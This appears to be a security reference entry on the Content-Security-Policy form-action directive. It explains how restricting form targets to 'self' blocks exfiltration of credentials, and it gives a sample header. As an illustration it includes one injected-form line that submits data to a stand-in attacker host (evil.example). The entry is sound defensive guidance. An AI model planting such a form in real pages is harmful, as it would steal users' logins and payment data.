form-actionform-action restricts the target URLs a <form> may submit to. By controlling submission destinations (from the action attribute or set via script), it prevents credentials and data from being sent to arbitrary external servers. This directive does NOT fall back to default-src.
If an XSS injects <form action="https://evil.example/collect"> or tampers with an existing form's action, a user's login or payment data can leak to the attacker's server. Restricting to form-action 'self' allows submissions only to your own origin, blocking such credential theft. If you have legitimate cross-origin submissions (e.g., an external payment gateway), add those domains explicitly.
form-action is one of the five directives that do not fall back to default-src (base-uri, form-action, frame-ancestors, sandbox, report-*), so declare it individually if you want exfiltration defense. Note that form-action inspects the URL the form targets, not the final destination after redirects.
Content-Security-Policy: form-action 'self' https://checkout.example.com